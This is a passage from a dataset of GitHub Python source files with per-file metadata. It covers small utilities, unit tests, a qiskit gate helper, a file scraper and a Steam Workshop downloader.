main()\n","repo_name":"YisHub/Pokemon_Fight","sub_path":"Pokemon_fight.py","file_name":"Pokemon_fight.py","file_ext":"py","file_size_in_byte":9297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30288508237","text":"import matplotlib.pyplot as plt\r\n\r\ndef suite_fibonacci (n):\r\n F0 , F1 = 0 , 1\r\n if n <= 1:\r\n return n\r\n else:\r\n return suite_fibonacci(n-1) + suite_fibonacci(n-2)\r\n\r\nnbr_rep = int(input(\"Entrez le nombre de répétitions : \"))\r\ny = []\r\nfor i in range(nbr_rep):\r\n y.append(suite_fibonacci(i))\r\n\r\nphi = y[-1]/y[-2]\r\nprint(f\"Nombre d'or : {phi} \\navec les termes {y[-1]} et {y[-2]} sur {nbr_rep} répétitions\")\r\n\r\nplt.plot(y)\r\nplt.title(\"Suite de Fibonacci\")\r\nplt.xlabel(r'$\\mathrm{x}$')\r\nplt.ylabel(r\"$F(\\mathrm{x})$\")\r\nplt.show()","repo_name":"Guamss/suite_fibonacci","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":556,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14350400769","text":"import itertools\nimport math\n\nfrom qiskit import QuantumRegister, QuantumCircuit, ClassicalRegister\nfrom qiskit.circuit import Gate, InstructionSet\nfrom qiskit.dagcircuit import DAGCircuit\nfrom qiskit.extensions.standard import *\nfrom qiskit.qasm import pi\n\n\ndef toffoli(number_qubits: int):\n assert number_qubits >= 2\n q = QuantumRegister(number_qubits)\n qc = QuantumCircuit(q, name=\"toffoli\")\n # for i in range(number_qubits-1):\n # qc.h(controls[i])\n qc.ntoffoli(q[number_qubits-1], *q[0:number_qubits-1])\n # qc.measure(controls, c_controls)\n # qc.measure(target, c_target)\n return qc\n\nclass NcrxGate(Gate):\n \"\"\"n-controlled x rotation gate.\"\"\"\n\n def __init__(self, theta, tgt, *ctls, circ=None):\n \"\"\"Create new Toffoli gate.\"\"\"\n assert len(ctls) >= 1\n super().__init__(f\"c^{len(ctls)}rx\", [theta], [tgt] + list(ctls), circ)\n\n def _define_decompositions(self):\n decomposition = DAGCircuit()\n nr_qubits = len(self.qargs)\n q = QuantumRegister(nr_qubits)\n last_control = q[1]\n target = q[0]\n decomposition.add_qreg(q)\n if nr_qubits == 2:\n # Equal to crx of theta\n crx_theta = Cu3Gate(self.params[0], -pi/2, pi/2, last_control, target)\n decomposition.apply_operation_back(crx_theta)\n else:\n # Recurse\n rule = [\n # C-sqrt(rx(theta)) gate\n Cu3Gate(self.params[0]/2, -pi/2, pi/2, last_control, target),\n NcrxGate(pi, last_control, *q[2:]), # toffoli\n Cu3Gate(self.params[0]/2, -pi/2, pi/2, last_control, target).inverse(),\n NcrxGate(pi, last_control, *q[2:]), # toffoli\n NcrxGate(self.params[0]/2, target, *q[2:]) # c^nrx(theta/2) gate on n-1 qubits\n ]\n for inst in rule:\n decomposition.apply_operation_back(inst)\n # decomposition.apply_operation_back(ToffoliGate(q[1], q[2], q[0]))\n self._decompositions = [decomposition]\n\n def inverse(self):\n \"\"\"Invert this gate.\"\"\"\n return self # self-inverse\n\n def reapply(self, circ):\n \"\"\"Reapply this gate to corresponding qubits in circ.\"\"\"\n self._modifiers(circ.ncrx(self.params[0], self.qargs[0], *self.qargs[1:]))\n\ndef ncrx(self, theta, tgt, *ctls):\n \"\"\"Apply n-controlled x-rotation(theta) to target from controls\"\"\"\n if all(isinstance(ctl, QuantumRegister) for ctl in ctls) and \\\n isinstance(tgt, QuantumRegister) and \\\n all(len(ctl) == len(tgt) for ctl in ctls):\n instructions = InstructionSet()\n for i in range(ctls[0].size):\n instructions.add(self.ntoffoli(theta, (tgt, i), *zip(ctls, itertools.repeat(i))))\n return instructions\n\n for ctl in ctls:\n self._check_qubit(ctl)\n self._check_qubit(tgt)\n self._check_dups(list(ctls) + [tgt])\n return self._attach(NcrxGate(theta, tgt, *ctls, circ=self))\n\ndef ntoffoli(self, tgt, *ctls):\n \"\"\"Apply n-controlled Toffoli to tgt with controls.\"\"\"\n if all(isinstance(ctl, QuantumRegister) for ctl in ctls) and \\\n isinstance(tgt, QuantumRegister) and \\\n all(len(ctl) == len(tgt) for ctl in ctls):\n instructions = InstructionSet()\n for i in range(ctls[0].size):\n instructions.add(self.ntoffoli((tgt, i), *zip(ctls, itertools.repeat(i))))\n return instructions\n\n for ctl in ctls:\n self._check_qubit(ctl)\n self._check_qubit(tgt)\n self._check_dups(list(ctls) + [tgt])\n return self._attach(NcrxGate(pi, tgt, *ctls, circ=self))\n\nQuantumCircuit.ncrx = ncrx\nQuantumCircuit.ntoffoli = ntoffoli\n","repo_name":"eddieschoute/circuit-benchmarks","sub_path":"circuit_benchmarks/toffoli.py","file_name":"toffoli.py","file_ext":"py","file_size_in_byte":3673,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"32902631370","text":"def merge_sort(arr):\n if len(arr) < 2:\n return arr\n \n mid = len(arr) // 2\n left = arr[:mid]\n right = arr[mid:]\n\n left = merge_sort(left)\n right = merge_sort(right)\n\n return merge(left, right)\n\ndef merge(left, right):\n sorted_list = []\n len_left = len(left)\n len_right = len(right)\n i,j = 0,0\n\n while i < len_left and j < len_right:\n if left[i] <= right[j]:\n sorted_list.append(left[i])\n i += 1\n else:\n sorted_list.append(right[j])\n j += 1\n \n if i < len_left:\n for l in range(i, len_left):\n sorted_list.append(left[l])\n if j < len_right:\n for r in range(j, len_right):\n sorted_list.append(right[r])\n return sorted_list\n\nif __name__ == \"__main__\":\n nums = [7, 2, 1, 6, 8, 5, 3, 4]\n nums = merge_sort(nums)\n print(nums)","repo_name":"renyitan/data-structures-and-algorithms","sub_path":"python/algorithms/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23082573856","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/10/11 上午9:10\n# @Author : Hou Rong\n# @Site : \n# @File : test_images_task.py\n# @Software: PyCharm\nimport sys\n\n# sys.path.append('/data/lib')\nprint(sys.path)\nfrom proj.my_lib.Common.Task import Task\nfrom proj.total_tasks import images_task\n\nif __name__ == '__main__':\n # get_images(\n # **{\n # 'source': \"booking\",\n # 'new_part': \"detail_hotel_booking_20170929a\",\n # 'target_url': \"https://q.bstatic.com/images/hotel/max1024x768/135/13504008.jpg\",\n # 'desc_path': \"/data/nfs/image/img_hotel_booking_20170929a_filter\",\n # 'is_poi_task': False,\n # 'source_id': \"287127\",\n # 'part': \"20170929a\",\n # 'file_path': \"/data/nfs/image/img_hotel_booking_20170929a\",\n # \"task_name\": \"images_hotel_booking_20170929a\",\n # \"task_response\": TaskResponse()\n # }\n # )\n\n # get_images(\n # **{\n # 'source': \"daodao\",\n # 'new_part': \"detail_attr_daodao_20171010a\",\n # 'target_url': \"https://ccm.ddcdn.com/ext/photo-s/0e/10/3c/6e/the-much-photographed.jpg\",\n # 'desc_path': \"/data/nfs/image/img_attr_daodao_20171010a_filter\",\n # 'is_poi_task': True,\n # 'source_id': \"7753114\",\n # 'part': \"20171010a\",\n # 'file_path': \"/data/nfs/image/img_attr_daodao_20171010a\",\n # \"task_name\": \"images_hotel_booking_20170929a\",\n # \"task_response\": TaskResponse()\n # }\n # )\n\n # get_images(\n # **{\n # 'source': \"booking\",\n # 'new_part': \"detail_hotel_booking_20170929a\",\n # 'target_url': \"https://s-ec.bstatic.com/images/hotel/max1024x768/337/33766112.jpg\",\n # 'desc_path': \"/data/nfs/image/img_hotel_booking_20170929a_filter\",\n # 'is_poi_task': False,\n # 'source_id': \"76675\",\n # 'part': \"20170929a\",\n # 'file_path': \"/data/nfs/image/img_hotel_booking_20170929a\",\n # \"task_name\": \"images_hotel_booking_20170929a\",\n # \"task_response\": TaskResponse()\n # }\n # )\n\n # get_images(\n # **{\n # 'source': \"daodao\",\n # 'new_part': \"detail_rest_daodao_20170928a\",\n # 'target_url': \"https://ccm.ddcdn.com/ext/photo-w/05/9d/be/f4/spaghetti-ai-ricci-di.jpg\",\n # 'desc_path': \"/data/nfs/image/img_rest_daodao_20170928a_filter\",\n # 'is_poi_task': True,\n # 'source_id': \"4697785\",\n # 'part': \"20170928a\",\n # 'file_path': \"/data/nfs/image/img_rest_daodao_20170928a\",\n # \"task_name\": \"images_rest_daodao_20170928a\",\n # \"task_response\": TaskResponse()\n # }\n # )\n\n # get_images(\n # **{\n # 'source': \"huantaoyou\",\n # 'new_part': \"image_wanle_huantaoyou_20171023a\",\n # 'target_url': \"http://img.huantaoyou.com/PUB/TH/TH00194/IM_3469e694e140462c93829c3469a69084.png\",\n # 'desc_path': \"/data/nfs/image/img_wanle_huantaoyou_20171023a_filter\",\n # 'is_poi_task': True,\n # 'source_id': \"test\",\n # 'part': \"20171023a\",\n # 'file_path': \"/data/nfs/image/img_wanle_huantaoyou_20171023a\",\n # \"task_name\": \"image_wanle_huantaoyou_20171023a\",\n # \"task_response\": TaskResponse()\n # }\n # )\n\n # get_images(\n # **{\n # 'source': \"ctrip\",\n # 'new_part': \"detail_hotel_ctrip_20170929a\",\n # 'target_url': \"//dimg04.c-ctrip.com/images/220n0h0000008txhgD341_W_1600_1200_Q70.jpg\",\n # 'desc_path': \"/data/nfs/image/img_hotel_ctrip_20170929a_filter\",\n # 'is_poi_task': False,\n # 'source_id': \"7491732\",\n # 'part': \"20170929a\",\n # 'file_path': \"/data/nfs/image/img_hotel_ctrip_20170929a\",\n # \"task_name\": \"images_hotel_ctrip_20170929a\",\n # \"task_response\": TaskResponse()\n # }\n # )\n task = Task(_worker='proj.total_tasks.images_task', _task_id='176ddbc7960c2a6f6d8d7c9baea65617', _source='tuniuGT',\n _type='DownloadImages',\n _task_name='image_GT_tuniu_20180414',\n _used_times=0, max_retry_times=6,\n # kwargs={\"source\": \"daodao\", \"new_part\": \"detail_attr_daodao_20171122a\",\n # \"target_url\": \"https://ccm.ddcdn.com/ext/photo-s/0f/dd/44/61/peaceful-time.jpg\",\n # \"source_id\": \"test\", \"bucket_name\": \"mioji-attr\", \"is_poi_task\": True, \"part\": \"20171122a\",\n # \"file_prefix\": \"\"},\n # kwargs={\n # \"source\": \"ihg\",\n # \"new_part\": \"detail_hotel_ihg_20171220a\",\n # \"target_url\": \"https://ihg.scene7.com/is/image/ihg/candlewood-suites-idaho-falls-3053752126-4x3?fmt=png-alpha\",\n # \"source_id\": \"idapd\",\n # \"bucket_name\": \"mioji-hotel\",\n # \"is_poi_task\": False,\n # \"part\": \"20171220a\",\n # \"file_prefix\": \"\"\n # },\n kwargs={\n 'file_prefix': 'tuniuGT',\n 'target_url': \"https://m.tuniucdn.com//fb2/t1/G3/M00/3D/0B/Cii_LlloJcyIGfs2AFyrXaRNclAAADnOgNM364AXKt1824_w640_h480_c1_t0.jpg\",\n 'source_id': \"210138695\",\n 'need_insert_db': True,\n 'source': \"tuniuGT\",\n 'bucket_name': 'mioji-grouptravel',\n 'is_poi_task': True,\n },\n _queue='file_downloader', _routine_key='file_downloader',\n list_task_token='', task_type=0\n )\n # kwargs={'source': \"huantaoyou\",\n # 'new_part': \"image_wanle_huantaoyou_20171023a\",\n # 'target_url': \"http://img.huantaoyou.com/PUB/TH/TH00194/IM_3469e694e140462c93829c3469a69084.png\",\n # 'is_poi_task': True,\n # 'source_id': \"test\",\n # 'part': \"20171023a\",\n # 'bucket_name': 'mioji-wanle',\n # 'file_prefix': 'anc'\n # })\n images_task(task=task)\n","repo_name":"20113261/platform_service","sub_path":"test/_test_images_task.py","file_name":"_test_images_task.py","file_ext":"py","file_size_in_byte":6222,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1192378854","text":"\"\"\"\n在百度和360搜索引擎上搜索关键字\n百度搜索引擎关键词接口:http:www.baidu.com/s?wd=keyword\n360:http://www/so/com/s?q=keyword\n\"\"\"\nimport requests\n\nurl = 'http://www.baidu.com/s'\nkeyword = {\"wd\": \"python\"}\ntry:\n c = requests.get(url, params=keyword)\n c.raise_for_status()\n print(c.request.url)\n print(c.text[0:1000])\nexcept:\n print('爬取失败')\n","repo_name":"xxyhhd/Crawler","sub_path":"baidu_search.py","file_name":"baidu_search.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19739899161","text":"import unittest\n\n\nfrom kimchi.osinfo import lookup, modern_version_bases, _get_arch\n\n\nclass OSInfoTests(unittest.TestCase):\n def test_default_lookup(self):\n entry = lookup(None, None)\n self.assertEquals('unknown', entry['os_distro'])\n self.assertEquals('unknown', entry['os_version'])\n self.assertEquals(['default'], entry['networks'])\n\n def test_old_distros(self):\n old_versions = {'debian': '5.0', 'ubuntu': '7.04', 'opensuse': '10.1',\n 'centos': '5.1', 'rhel': '5.1', 'fedora': '15'}\n for distro, version in old_versions.iteritems():\n entry = lookup(distro, version)\n self.assertEquals(entry['disk_bus'], 'ide')\n self.assertEquals(entry['nic_model'], 'e1000')\n\n def test_modern_bases(self):\n for distro, version in modern_version_bases[_get_arch()].iteritems():\n entry = lookup(distro, version)\n self.assertEquals(entry['disk_bus'], 'virtio')\n self.assertEquals(entry['nic_model'], 'virtio')\n\n def test_modern_distros(self):\n modern_versions = {'debian': '7.0', 'ubuntu': '12.04',\n 'opensuse': '12.3', 'centos': '6.4', 'rhel': '6.3',\n 'fedora': '18', 'gentoo': '12.1'}\n for distro, version in modern_versions.iteritems():\n entry = lookup(distro, version)\n self.assertEquals(entry['disk_bus'], 'virtio')\n self.assertEquals(entry['nic_model'], 'virtio')\n","repo_name":"gouzongmei/t1","sub_path":"tests/test_osinfo.py","file_name":"test_osinfo.py","file_ext":"py","file_size_in_byte":1504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8633723103","text":"a = (\"ayooooo\") #a is equal to the string \"ayooooo\"\nb = (\" this is my function\") #b is equal to the string, \" this is my function\"\n \ndef appendString(a,b): #def means to define. append means to add/combine and in this case, it means to \n return a+b #combine a and b. \n\nz=appendString(a,b) #z equals to combined string of a and b. \n\nprint(z) #the answer \n\n\n\nx=input(\"what you want in list\") #this is another way\nlist = {} \n \ndef app(x): \n list.append(x)\n\napp(input) \nprint(list)\n","repo_name":"Achyut-Labs/python-seva","sub_path":"class-8/excercise/Krishastringappending.py","file_name":"Krishastringappending.py","file_ext":"py","file_size_in_byte":662,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"12531619182","text":"import os\nimport logging\nfrom datetime import datetime\nimport time\n\nnow = datetime.now()\nfilename = f'logs/airflow-logs{now}-{now.hour}-{now.minute}-{now.second}'\nlogging.basicConfig(filename=filename, encoding='utf-8', level=logging.DEBUG)\n\ndef get_airflow_run_duration(num_runs, filesize, num_executors, executor_mem):\n duration = 0\n for i in range(num_runs):\n print(f\"This is run number {i+1}\")\n run_bash_command(f\"airflow variables set filesize {filesize}\")\n run_bash_command(f\"airflow variables set num_executors {num_executors}\")\n run_bash_command(f\"airflow variables set executor_mem {executor_mem}\")\n start = time.time()\n run_bash_command(\"airflow tasks test wordcount_dag count_words_task 2021-08-30\")\n end = time.time()\n duration += (end - start)\n return round((duration / num_runs), 2)\n\ndef write_file(input_1, input_2, input_3, input_4):\n with open('results_executor_mem.csv', 'a') as f:\n f.write(f\"{input_1},{input_2},{input_3},{input_4}\\n\")\n\ndef run_bash_command(command):\n stream = os.popen(command)\n logging.debug(stream.read())\n\ndef main():\n filesize = 1000000\n NUM_RUNS = 3\n executor = 4\n executor_mem = [\"20M\", \"50M\", \"100M\", \"1G\", \"4G\"]\n write_file(input_1=\"size\", input_2=\"average_time\", input_3=\"num_executors\", input_4=\"executor_mem\")\n for mem in executor_mem:\n average_time = get_airflow_run_duration(\n num_runs=NUM_RUNS,\n filesize=filesize,\n num_executors=executor,\n executor_mem=mem)\n print(f\"\"\"\nTime taken for wordcount,\nfilesize: {filesize}\nwith num executors {executor}\nis {average_time:.2f} seconds\"\"\")\n write_file(input_1=filesize, input_2=average_time, input_3=executor, input_4=mem)\n\nif __name__ == \"__main__\":\n main()\n ","repo_name":"ryanlow-tw/airflow-testing","sub_path":"run_executor_mem.py","file_name":"run_executor_mem.py","file_ext":"py","file_size_in_byte":1823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3651999076","text":"import re\r\nimport pickle\r\nfrom xpinyin import Pinyin\r\nfrom collections import defaultdict\r\n\r\ndef main():\r\n with open('F://poem.txt', 'r') as f:\r\n poems = f.readlines()\r\n\r\n sents = []\r\n for poem in poems:\r\n parts = re.findall(r'[\\s\\S]*?[。?!]', poem.strip())\r\n for part in parts:\r\n if len(part) >= 5:\r\n sents.append(part)\r\n\r\n poem_dict = defaultdict(list)\r\n for sent in sents:\r\n print(part)\r\n head = Pinyin().get_pinyin(sent, tone_marks='marks', splitter=' ').split()[0]\r\n poem_dict[head].append(sent)\r\n\r\n with open('./poemDict.pk', 'wb') as f:\r\n pickle.dump(poem_dict, f)\r\n\r\nmain()","repo_name":"percent4/Shicijielong","sub_path":"poem_sent_dict.py","file_name":"poem_sent_dict.py","file_ext":"py","file_size_in_byte":679,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"53"} +{"seq_id":"38957272610","text":"import urllib.request\r\nfrom urllib.request import urlopen, Request\r\nimport sys\r\nimport os\r\nimport requests\r\nimport wget\r\nfrom bs4 import BeautifulSoup\r\n\r\nheaders = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.3'}\r\ni = 0\r\ndef download(url,folder):\r\n\tglobal i\r\n\twith requests.get(url, stream=True) as r:\r\n\t\tr.raise_for_status()\r\n\t\tif \"?\" in url:\r\n\t\t\turl = url.split(\"?\")[-2]\r\n\t\ttry:\r\n\t\t\twith open(folder+'/'+str(i)+url.split('/')[-1], 'wb') as f:\r\n\t\t\t\tfor chunk in r.iter_content(chunk_size=8192): \r\n\t\t\t\t\tf.write(chunk)\r\n\t\t\t\ti=i+1\r\n\t\texcept Exception as e:\r\n\t\t\tprint(e)\r\ntry:\r\n\tos.mkdir(sys.argv[2])\r\n\treq = Request(url=sys.argv[1], headers=headers)\r\n\tdatos = urllib.request.urlopen(req).read().decode()\r\n\tsoup = BeautifulSoup(datos,features=\"html.parser\")\r\n\t\r\n\t# to images\r\n\ttags = soup('img')\r\n\tfor tag in tags:\r\n\t\turl = tag.get('src')\r\n\t\tif not 'data:' in url:\r\n\t\t\tif 'http' in url:\r\n\t\t\t\tdownload(url,sys.argv[2])\r\n\t\t\telse:\r\n\t\t\t\tif url[0]==\"/\":\r\n\t\t\t\t\tsplit_url = sys.argv[1].split('/')\r\n\t\t\t\t\turl = split_url[0]+\"//\"+split_url[2]+url \r\n\t\t\t\telse:\r\n\t\t\t\t\turl = sys.argv[1]+\"/\"+url \r\n\t\t\t\tdownload(url,sys.argv[2])\r\n\t\t\t\t\r\n\t# to files\t\r\n\tfiles = soup('a')\r\n\tfor file in files:\r\n\t\turl = file.get('href')\r\n\t\tif url:\r\n\t\t\tif \"?\" in url:\r\n\t\t\t\turl = url.split(\"?\")[-2]\r\n\t\t\tif 'http' in url:\r\n\t\t\t\tif url.endswith(\".pdf\") or url.endswith(\".doc\") or url.endswith(\".docx\") or url.endswith(\".xls\") or url.endswith(\".xlsx\"):\r\n\t\t\t\t\tdownload(url,sys.argv[2])\r\n\t\t\telse:\r\n\t\t\t\tif url.endswith(\".pdf\") or url.endswith(\".doc\") or url.endswith(\".docx\") or url.endswith(\".xls\") or url.endswith(\".xlsx\"):\r\n\t\t\t\t\tif url[0]==\"/\":\r\n\t\t\t\t\t\tsplit_url = sys.argv[1].split('/')\r\n\t\t\t\t\t\turl = split_url[0]+\"//\"+split_url[2]+url \r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\turl = sys.argv[1]+\"/\"+url \r\n\t\t\t\t\tdownload(url,sys.argv[2])\r\n\t\t\t\r\n\tprint(\"Successfully completed\")\r\nexcept Exception as e:\r\n\tprint(\"ERROR: can't get files, check its parameters or contact the developer.\")\r\n\tprint(e)","repo_name":"castro-miguel-1993/pyfiles","sub_path":"pyfiles.py","file_name":"pyfiles.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19688315764","text":"# ABC-165 B - 1%\n# https://atcoder.jp/contests/abc165/tasks/abc165_b\n#\ndef getInt():\n return int(input())\n\n\ndef main():\n x = getInt()\n\n a = 100\n c = 0\n while a < x:\n a += a // 100\n c += 1\n print(c)\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"hyperdb/AtCoderPy","sub_path":"ABC/101-200/161-170/ABC-165-B.py","file_name":"ABC-165-B.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"20334523659","text":"#!/usr/bin/python3\n\nimport sys\nimport getopt\nimport os\nimport urllib.request\nimport urllib.parse\nfrom urllib.error import HTTPError, URLError\nimport json\nimport time\nimport threading\n\n# Downloading a large collection at once on a new install of L4D2 may cause errors on bootup.\n# Set this if you'd like to cap the amount of downloads at once. (Undownloaded plugins will resume\n# next time the script launches). 0 = don't limit downloads.\ng_iLimitDownloads = 0\n\ndef safe_print(*objects, errors='ignore', **kwargs):\n '''\n An ascii-only print function to avoid encoding issues.\n '''\n print(*(str(t).encode('ascii', errors=errors).decode('ascii') for t in objects), **kwargs)\n\ndef usage(cmd, exit):\n print(\"usage: \" + cmd + \" [-o ] []...\" \\\n \" \")\n sys.exit(exit)\n\nconst_urls = {\n 'file': \"http://api.steampowered.com/ISteamRemoteStorage/\" \\\n \"GetPublishedFileDetails/v1\",\n 'collection': \"http://api.steampowered.com/ISteamRemoteStorage/\" \\\n \"GetCollectionDetails/v0001\"\n}\n\nconst_data = {\n 'file': {'itemcount': 0, 'publishedfileids[0]': 0},\n 'collection': {'collectioncount': 0, 'publishedfileids[0]': 0}\n}\n\ndownload_lock = threading.Lock()\n\ndef download_plugins_concurrently(output_dir, plugins, old_plugins):\n fail = []\n succeed = {}\n error = 0\n downloads = 0\n\n def download_plugin(plugin):\n nonlocal error, downloads\n if 'file_url' in plugin:\n plugin_display_name = '\"{title}\" ({publishedfileid}.vpk)'.format(**plugin)\n if plugin['publishedfileid'] in old_plugins and \\\n old_plugins[plugin['publishedfileid']]['time_updated'] == \\\n plugin['time_updated']:\n safe_print(\"Plugin \" + plugin_display_name + \" already up-to-date\")\n succeed[plugin['publishedfileid']] = {k: plugin[k] for k in ('title', 'time_updated') if k in plugin}\n else:\n try:\n name = plugin['publishedfileid'] + \".vpk\"\n safe_print(\"Downloading \" + plugin_display_name)\n path = os.path.join(output_dir, name)\n urllib.request.urlretrieve(plugin['file_url'], path)\n print(\"Downloading complete\")\n succeed[plugin['publishedfileid']] = {k: plugin[k] for k in ('title', 'time_updated') if k in plugin}\n downloads += 1\n if downloads == g_iLimitDownloads:\n print(\"Finished downloading limited map pool ({}/{} plugins downloaded)\".format(downloads, downloads))\n\n time.sleep(10)\n\n except HTTPError as e:\n with download_lock:\n error += 1\n fail.append(plugin)\n safe_print(\"Server returned \" + str(e.code) + \" error on \" + plugin_display_name)\n\n threads = []\n for plugin in plugins:\n if downloads >= g_iLimitDownloads and g_iLimitDownloads != 0:\n continue\n thread = threading.Thread(target=download_plugin, args=(plugin,))\n thread.start()\n threads.append(thread)\n\n for thread in threads:\n thread.join()\n\n return error, fail, succeed\n\ndef init(argv):\n error = 0\n output_dir = os.getcwd()\n collections_id_list = []\n save_file = os.path.join(output_dir, \"addons.lst\")\n if len(argv) == 1 and not os.path.isfile(save_file):\n print(\"No save file found\")\n usage(argv[0], 0)\n try:\n opts, args = getopt.getopt(argv[1:], \"ho:\")\n except getopt.GetoptError:\n usage(argv[0], 2)\n else:\n for opt, arg in opts:\n if opt == 'h':\n usage(argv[0], 0)\n elif opt == '-o':\n output_dir = os.path.abspath(arg)\n save_file = os.path.join(output_dir, \"addons.lst\")\n if not os.path.exists(output_dir):\n print(output_dir + \": path doesn't exist\\nEnd of program\")\n error += 1\n collections_id_list = argv[len(opts) * 2 + 1:]\n return error, output_dir, collections_id_list, save_file\n\ndef load_saved_data(save_file):\n if os.path.isfile(save_file):\n with open(save_file, 'r') as file:\n saved_data = json.load(file)\n else:\n saved_data = {}\n return saved_data\n\ndef get_plugins_id_from_collections_list(collections_id_list):\n valid_collections = []\n sub_collection = []\n plugins_id_list = []\n error = None\n data = const_data['collection']\n data['collectioncount'] = len(collections_id_list)\n for idx, collection_id in enumerate(collections_id_list):\n data['publishedfileids[' + str(idx) + ']'] = collection_id\n encode_data = urllib.parse.urlencode(data).encode('ascii')\n try:\n response = urllib.request.urlopen(const_urls['collection'], encode_data, timeout=10)\n except HTTPError as e:\n print(\"Server returned \" + str(e.code) + \" error\")\n error = e\n except URLError as e:\n print(\"Can't reach server: \" + e.reason)\n error = e\n else:\n json_response = json.loads(response.read().decode('utf-8'))\n for collection in json_response['response']['collectiondetails']:\n if 'children' in collection:\n valid_collections.append(collection['publishedfileid'])\n for item in collection['children']:\n if item['filetype'] == 0:\n plugins_id_list.append(item['publishedfileid'])\n elif item['filetype'] == 2:\n sub_collection.append(item['publishedfileid'])\n else:\n print(\"Unrecognized filetype: \" + str(item['filetype']))\n if sub_collection:\n error, plugins_id_list_temp, _ = get_plugins_id_from_collections_list(sub_collection)\n if error is None:\n plugins_id_list += plugins_id_list_temp\n return error, plugins_id_list, valid_collections\n\ndef get_plugins_info(plugins_id_list):\n plugin_info = []\n error = None\n data = const_data['file']\n data['itemcount'] = len(plugins_id_list)\n for idx, plugin_id in enumerate(plugins_id_list):\n data['publishedfileids[' + str(idx) + ']'] = plugin_id\n encode_data = urllib.parse.urlencode(data).encode('ascii')\n try:\n response = urllib.request.urlopen(const_urls['file'], encode_data, timeout=10)\n except HTTPError as e:\n print(\"Server returned \" + str(e.code) + \" error\")\n error = e\n except URLError as e:\n print(\"Can't reach server: \" + e.reason)\n error = e\n else:\n json_response = json.loads(response.read().decode('utf-8'))\n for plugin in json_response['response']['publishedfiledetails']:\n plugin_info.append(plugin)\n return error, plugin_info\n\ndef plugins_to_remove(plugins_id_list, old_plugins):\n # Initialize a list to store deprecated plugins\n deprecated_plugins = []\n\n # Iterate through the keys (plugin IDs) in old_plugins\n for plugin_id in old_plugins.keys():\n # Check if the plugin ID is not in the plugins_id_list\n if plugin_id not in plugins_id_list:\n # If it's not in the list, it's deprecated, so add it to the deprecated_plugins list\n deprecated_plugins.append(plugin_id)\n\n # Return the list of deprecated plugins\n return deprecated_plugins\n\n\ndef main(argv):\n sleep = 15\n error, output_dir, collections_id_list, save_file = init(argv)\n if error == 0:\n saved_data = load_saved_data(save_file)\n if 'collections' in saved_data:\n if not collections_id_list:\n collections_id_list = saved_data['collections']\n else:\n collections_id_list += saved_data['collections']\n collections_id_list = list(set(collections_id_list))\n if not collections_id_list:\n print(\"No collection(s) ID given and no collection(s) ID found in \" + save_file)\n error = 1\n if error == 0:\n error, plugins_id_list, valid_collections = get_plugins_id_from_collections_list(collections_id_list)\n if error is None:\n saved_data['collections'] = valid_collections\n if 'plugins' in saved_data:\n old_plugins = saved_data['plugins']\n deprecated_plugins = plugins_to_remove(plugins_id_list, old_plugins)\n deprecated_plugins = list(set(deprecated_plugins))\n if deprecated_plugins:\n error, deprecated_plugin_info = get_plugins_info(deprecated_plugins)\n if error is None:\n print(\"\\nSome plugins found which are no longer in workshop collection(s).\")\n print(\"Removing deprecated plugins:\\n\")\n print_deprecated_info(deprecated_plugin_info)\n saved_data, old_plugins = deletePlugins(deprecated_plugins, output_dir, saved_data, old_plugins)\n plugins_id_list += old_plugins.keys()\n plugins_id_list = list(set(plugins_id_list))\n else:\n old_plugins = {}\n saved_data['plugins'] = {}\n error, plugins_info = get_plugins_info(plugins_id_list)\n if error is None:\n num_download_failures = 0\n print(\"\\n\")\n while plugins_info and num_download_failures < 5:\n error, plugins_info, succeed_temp = download_plugins_concurrently(output_dir, plugins_info, old_plugins)\n saved_data['plugins'].update(succeed_temp)\n with open(save_file, 'w') as file:\n json.dump(saved_data, file, indent=4)\n if error > 0:\n print(f\"{len(plugins_info)} plugins failed to download, retrying in {sleep} seconds\")\n time.sleep(sleep)\n num_download_failures += 1\n print('--------------------------------------------------')\n print(f'Failed downloads (attempt #{num_download_failures} / 5)')\n else:\n num_download_failures = 0\n if num_download_failures:\n print('Gave up on downloading all plugins, blame Valve')\n else:\n print('Downloaded all plugins successfully')\n\nif __name__ == \"__main__\":\n main(sys.argv)\n\n","repo_name":"gothickitty93/steam_workshop_downloader","sub_path":"workshop.py","file_name":"workshop.py","file_ext":"py","file_size_in_byte":10295,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"12894244696","text":"import pytest\n\nfrom seventweets.auth import auth\nfrom seventweets.exceptions import Unauthorized\n\n\n@pytest.mark.parametrize(\n ('server_token', 'client_token'),\n [\n ('token', 'different token'),\n (None, 'client token'),\n ('server token', None),\n (None, None),\n ],\n ids=('different', 'only-client', 'only-server', 'none')\n)\ndef test_auth_fail(app, server_token, client_token):\n app.config['ST_API_TOKEN'] = server_token\n\n @auth\n def 